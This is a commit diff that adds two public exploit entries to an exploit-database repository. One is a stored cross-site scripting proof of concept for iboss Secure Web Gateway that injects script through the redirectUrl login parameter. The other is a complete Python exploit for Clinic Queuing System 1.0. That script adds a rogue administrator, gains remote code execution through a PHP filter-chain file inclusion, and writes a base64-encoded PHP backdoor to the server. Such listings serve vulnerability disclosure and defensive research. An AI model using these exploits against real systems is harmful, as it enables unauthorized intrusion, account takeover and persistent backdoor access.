DB: 2024-05-09

3 changes to exploits/shellcodes/ghdb iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS) Clinic Queuing System 1.0 - RCE
CERTCC · May 9, 2024 · edacab1 · edacab1
1 parent b8a6809
commit edacab1
Show file tree

Hide file tree

Showing 3 changed files with 116 additions and 0 deletions.
diff --git a/exploits/multiple/webapps/52009.txt b/exploits/multiple/webapps/52009.txt
@@ -0,0 +1,43 @@
+# Exploit Title: iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)
+# Date: 4/4/2024
+# Exploit Author: modrnProph3t
+# Vendor Homepage: https://www.iboss.com
+# Version: < 10.2.0
+# CVE-2024-3378
+# Reference: https://github.com/modrnProph3t/CVE/blob/main/CVE-2024-3378.md
+
+
+## Description
+A stored Cross Site Scripting (XSS) vulnerability was found in the iboss Secure Web Gateway product. The vulnerability is exploited by submitting a login attempt, intercepting the request, and adding a payload to the ÒredirectUrlÓ parameter before sending it to the server. After submitting the request, visiting the initial login page will cause the website to load, including the previously submitted payload.
+
+This is an unauthenticated attack (credentials do not need to be valid) and the payload is stored on the server and included in every response to a GET request for the login page until a new POST request is made to the server without a payload included.
+
+## Proof of Conept
+1. Access the login portal located at /login
+
+
+2. Submit login attempt and intercept the request
+
+Example of unaltered request:
+```
+POST /user_login_submit HTTP/1.1
+Host: <domain>
+<--Headers Removed-->
+
+userName=TEST&x=TEST&action=login&redirectUrl=
+```
+
+
+3. Insert XSS payload into the "redirectUrl" parameter
+
+Example of request with inserted payload:
+```
+POST /user_login_submit HTTP/1.1
+Host: <domain>
+<--Headers Removed-->
+
+userName=TEST&x=TEST&action=login&redirectUrl="><script>alert('XSS')</script>
+```
+
+
+4. After failed login attempt, return to the initial login page at the /login endpoint and observe payload execution
diff --git a/exploits/php/webapps/52008.py b/exploits/php/webapps/52008.py
@@ -0,0 +1,71 @@
+# Exploit Title: Clinic Queuing System 1.0 RCE
+# Date: 2024/1/7
+# Exploit Author: Juan Marco Sanchez
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html
+# Version: 1.0
+# Tested on: Debian Linux Apache Web Server
+# CVE: CVE-2024-0264 and CVE-2024-0265
+
+import requests
+import random
+import argparse
+from bs4 import BeautifulSoup
+
+parser = argparse.ArgumentParser()
+parser.add_argument("target")
+args = parser.parse_args()
+
+base_url = args.target
+phase1_url = base_url + '/LoginRegistration.php?a=save_user'
+phase2_url = base_url + '/LoginRegistration.php?a=login'
+
+filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=home"
+
+def phase1(): # CVE-2024-0264
+	rand_user = 'pwn_'+str(random.randint(100, 313))
+	rand_pass = 'pwn_'+str(random.randint(100, 313))
+	pwn_user_data = {'formToken':'','fullname':'pwn!','username':rand_user,'password':rand_pass,'status':1,'type':1}
+	print("[*] adding administrator " + rand_user + ":" + rand_pass)
+	phase1 = requests.post(phase1_url, pwn_user_data)
+	if "User Account has been added successfully." in phase1.text:
+		print("[+] Phase 1 Success - Admin user added!\n")
+		print("[*] Initiating Phase 2")
+		phase2(rand_user, rand_pass)
+	else:
+		print("[X] user creation failed :(")
+		die()
+
+def phase2(user, password): # CVE-2024-0265
+	s = requests.Session();
+	login_data = {'formToken':'','username':user, 'password':password}
+	print("[*] Loggin in....")
+	phase2 = s.post(phase2_url, login_data)
+
+	if "Login successfully." in phase2.text:
+		print("[+] Login success")
+	else:
+		print("[X] Login failed.")
+		die()
+
+	print("[+] Preparing for RCE via LFI PHP FIlter Chaining...\n")
+	rce_url = base_url + "/?page=" + filter_chain + "&0=echo '|jmrcsnchz|<pre>'.shell_exec('id').'</pre>';"
+	#print("[*] Payload: " + rce_url)
+	rce = s.get(rce_url)
+
+	if "jmrcsnchz" in rce.text:
+		print("[+] RCE success!")
+		soup = BeautifulSoup(rce.text, 'html.parser')
+		print("[+] Output of id: " + soup.pre.get_text())
+		print("[*] Uploading php backdoor....")
+		s.get(base_url + "/?page=" + filter_chain + "&0=file_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'));")
+		print("[+] Access at " + base_url + "/rce.php?0=whoami")
+	else:
+		print("[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.")
+		die()
+
+try:
+	print("[*] Initiating Phase 1")
+	phase1()
+except:
+	print("Exploit failed.")
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -11948,6 +11948,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32908,exploits/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",webapps,multiple,,2009-04-14,2014-04-16,1,CVE-2009-1334;OSVDB-53651,,,,,https://www.securityfocus.com/bid/34513/info
 32576,exploits/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection",2008-11-10,"Francesco Bianchino",webapps,multiple,,2008-11-10,2014-03-29,1,,,,,,https://www.securityfocus.com/bid/32233/info
 17404,exploits/multiple/webapps/17404.txt,"IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery",2011-06-15,"Core Security",webapps,multiple,,2011-06-15,2011-06-15,1,CVE-2010-3271;OSVDB-73052,,,,,http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Finding_bugs_and_publishing_advisories
+52009,exploits/multiple/webapps/52009.txt,"iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)",2024-05-08,modrnProph3t,webapps,multiple,,2024-05-08,2024-05-08,0,,,,,,
 49148,exploits/multiple/webapps/49148.txt,"ILIAS Learning Management System 4.3 - SSRF",2020-12-02,Dot,webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
 10630,exploits/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login",2009-12-24,Sora,webapps,multiple,,2009-12-23,,1,,,,,,
 28854,exploits/multiple/webapps/28854.txt,"Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection",2013-10-10,"Giuseppe D'Amore",webapps,multiple,,2013-10-10,2013-10-10,0,OSVDB-98372,,,,,
@@ -15888,6 +15889,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50439,exploits/php/webapps/50439.py,"Clinic Management System 1.0 - SQL injection to Remote Code Execution",2021-10-22,"Pablo Santiago",webapps,php,,2021-10-22,2021-11-29,0,,,,,,
 48544,exploits/php/webapps/48544.txt,"Clinic Management System 1.0 - Unauthenticated Remote Code Execution",2020-06-04,BKpatron,webapps,php,,2020-06-04,2020-06-04,0,,,,,,
 46642,exploits/php/webapps/46642.txt,"Clinic Pro v4 - 'month' SQL Injection",2019-04-03,"Abdullah Çelebi",webapps,php,80,2019-04-03,2019-04-03,0,,"SQL Injection (SQLi)",,,,
+52008,exploits/php/webapps/52008.py,"Clinic Queuing System 1.0 - RCE",2024-05-08,"Juan Marco Sanchez",webapps,php,,2024-05-08,2024-05-08,0,,,,,,
 51779,exploits/php/webapps/51779.txt,"Clinic's Patient Management System 1.0 - Unauthenticated RCE",2024-02-05,"Oğulcan Hami Gül",webapps,php,,2024-02-05,2024-02-05,0,,,,,,
 9255,exploits/php/webapps/9255.txt,"Clip Bucket 1.7.1 - Insecure Cookie Handling",2009-07-24,Qabandi,webapps,php,,2009-07-23,,1,,,,,,
 12383,exploits/php/webapps/12383.txt,"clipak - Arbitrary File Upload",2010-04-25,indoushka,webapps,php,,2010-04-24,,1,,,,,,